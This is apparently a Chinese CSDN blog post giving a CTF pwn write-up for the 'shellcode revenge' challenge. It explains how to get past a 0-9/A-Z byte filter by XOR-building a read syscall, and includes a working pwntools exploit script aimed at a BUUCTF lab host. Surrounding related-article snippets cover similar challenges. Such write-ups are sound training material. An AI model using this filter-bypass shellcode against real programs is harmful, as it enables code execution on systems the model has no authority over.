【pwn】shellcode revenge --0~9,A~Z字符的shellcode

最新推荐文章于 2024-05-15 07:16:20 发布
最新推荐文章于 2024-05-15 07:16:20 发布
阅读量48 收藏
点赞数
文章标签: c语言 安全 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/question55/article/details/134751151
版权

查一下保护

拖进ida看主要逻辑

这里的代码逻辑为mmap开辟一段有执行的地址,可以写入shellcode,但这次写入的shellcode有限制 if ( buf > 90 || buf <= 47 || buf > 57 && buf <= 64 ) break;这里的限制shellcode的十六进制数对应的字符只能是0~9,A~Z,这些十六进制数对应的shellcode基本都是xor

我们gdb调试一下看一下寄存器的值

我们在这里下个断点,然后输入一堆22222222222222222222222222222222222

可以发现这里rax=0,rdi=0,rsi=地址,rdx=地址,这里可以构造read函数,然后就可以读入shellcode,可以绕过字符限制,但这里syscall的十六进制的代码是0f 05

代码如下:

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

shellcode="syscall"

print(asm(shellcode))

可以发现,显然是不满足上面所限制的十六进制数,但这里可以用异或来达到shellcode的构造,exp如下:

python

from pwn import *
 
context(arch='amd64',os='linux',log_level='debug')
 
p = remote("node4.buuoj.cn",26157)
 
#p = process('./shellcodere')
 
 
 
payload =  b'\x33\x42\x38'  #33 42 38 xor eax, DWORD PTR [rdx+0x38]   
 
payload += b'\x31\x42\x30'  #31 42 30 xor DWORD PTR [rdx+0x30], eax   将\x4e\x44异或成syscall的十六进制数
 
payload += b'\x33\x42\x37'  #33 42 38 xor eax, DWORD PTR [rdx+0x38] ,eax置0,为调用read函数准备
 
payload += b'\x31\x42\x38'  #31 42 38 xor DWORD PTR [rdx+0x38], eax  减syscall后面代码变成nop,为后面执行shellcode做准备
 
payload += b'\x59'*(0x30-len(payload))  #59 pop rcx
 
payload += b'\x4e\x44'*2  #syscall  0x4e^0x41=0xf 0x44^0x41=0x5   
 
payload += b'A'*8           #xor key
 
p.sendlineafter("magic\n",payload)
GGb0mb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode
mcmuyanga的博客
03-15 3544
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
mrctf2020_shellcode_revenge
z1r0的博客
01-12 2823
mrctf2020_shellcode_revenge 查看保护 只能看汇编,那就看一下吧,这个函数意思其实就是输入的长度大于0则中转到11ac。看一下11ac 给rbp-4的地方赋值为0,接着进123a 这个函数其实就是如果输入字符串长度大于0则跳转到11b8,否则call。这里放shellcode 不在0x60-0x7a跳转 0x40-0x5a 0x2f-0x5a 可以看到当0x60-0x70时不会跳转,0x2f-0x5a时不会跳转,输入shellcode字符就应该保持在这个范围里即可
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
Y_peak的博客
03-29 1152
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀。 不过这道题,刷新了我的认知。众所周知,手写的shellcode里面肯定有很多不可见字符。第一次碰到可见的shellcode。 看下IDA, 不能反汇编不过问题不大,没事. 个人建议,看汇编的时候,建议看流程图,更加直观 将shellcode写入,那个buf 不过下面肯定大于0呀.rbp + var_8是我们输入字符串的长度.发生转
pwn 手写Shellcode保姆级教程★
YX-hueimie
10-20 2306
本文章为手写Shellcode的教程,本文章将会围绕 NewStarCTF 2023 WEEK2 中的shellcode revenge一题展开,深入浅出带你一起编写shellcode。学完本文章,你将会有以下收获:加深对shellcode的理解,提升shellcode的编写能力,提升汇编能力,熟练掌握“异或”操作。
NewStarCTF pwn
iczfy585的博客
10-21 971
NewStarCTF中pwn的一些wp
BUUCTF pwn wp 86 - 90
fa1c4的blog
01-17 594
mrctf2020_shellcode_revenge 一道经典题目, 可见字符shellcode. F5失败直接读汇编 ; Attributes: bp-based frame ; int __cdecl main(int argc, const char **argv, const char **envp) public main main proc near buf= byte ptr -410h var_8= dword ptr -8 var_4= dword ptr -4 ; __unwi
BUUCTF-PWN刷题记录-9
weixin_44145820的博客
04-17 1456
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
PWN-PRACTICE-BUUCTF-25
P1umH0的博客
09-10 716
PWN-PRACTICE-BUUCTF-25wustctf2020_name_your_catciscn_2019_final_2mrctf2020_shellcode_revengezctf2016_note2 wustctf2020_name_your_cat 通过数组越界写返回地址为后门shell的地址 from pwn import * #io=process('./wustctf2020_name_your_cat') io=remote('node4.buuoj.cn',28864) elf=E
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
比大小(打擂台)(C语言
m0_67184754的博客
05-14 212
【代码】比大小(打擂台)(C语言
c语言:递归与迭代
qq_58761784的博客
05-14 1088
它却没有得出结果,这是为什么呢,因为,函数在内部多次调用了自己,产生了大量的重复计算,导致计算量巨大,代码执行效率非常低,让计算机也无法快速得出结果,这个例子告诉我们,递归是有使用条件的 ,如果要设计一个需要重复计算的程序,不能无脑使用递归,而是首先要思考递归能不能用,是否能让代码简洁的同时,更加高效,那么此类例子我们如何解决呢?可以看到,很快就得到了结果,但是答案是错误的,因为要求的数太大,一个字节无法表示,但是我们可以很直观的看见两者的差别,在这这样一个例子中,使用迭代会优于使用递归。
手撕C语言题典——链表的中间节点
Antigonos的博客
05-14 400
链表的中间节点同样也是力扣上一道简单题,适合刚学过单链表的我们更好的理解链表相关知识~
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
最新发布
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
pwn shellcode
05-19
Pwn shellcode是一种用于漏洞利用的机器码,常用于执行特定操作的代码。下面是一个简单的pwn shellcode示例: ```assembly section .text global _start _start: xor eax, eax ; 设置eax寄存器为0,清空寄存器 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值